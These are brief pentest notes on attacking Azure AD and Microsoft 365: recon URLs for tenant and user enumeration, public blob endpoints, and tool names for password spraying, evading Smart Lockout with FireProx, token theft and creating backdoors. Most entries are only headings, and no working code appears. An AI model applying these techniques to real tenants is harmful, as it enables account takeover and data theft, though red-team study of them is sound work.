Pentest - Azure AD
Basic Recon
Detect M365 usage: https://login.microsoftonline.com/getuserrealm.srf?login=test@acmecorp.com&xml=1
Tenant ID: https://login.microsoftonline.com/<target domain>/v2.0/.well-known/openid-configuration
User enumeration: https://login.Microsoft.com/common/oauth2/token
Detect invalid users while password spraying with: MSOLSpray
Enumerate users via OneDrive: onedrive_user_enum
Data in public Azure blobs:
- storage-acct-name.blob.core.windows.net
- storage-acct-name.file.core.windows.net
- storage-acct-name.table.core.windows.net
- storage-acct-name.queue.core.windows.net
Cloud_enum - Chris Moberly clound_enum Azure Smart Lockout - protection from pw spray; bypass with FireProx + MSOLSpray fireprox
User Account Enumeration
Password Spray Attacks with PowerShell
Conditional Access as Code
Breach Response
PIM Roles - PowerShell
CAP - Priv Workstation for GA
Tenant Enum with B2B guest accounts
Mapping Tenant
Attack CAP
365 Data Exfil
Incident Response
Protect Identities
Risky User Report
Create Backdoor in AAD
AADInternals PowerShell module:
Tokens
Token Theft - Red Team (TrustedSec)
Token Tactics: github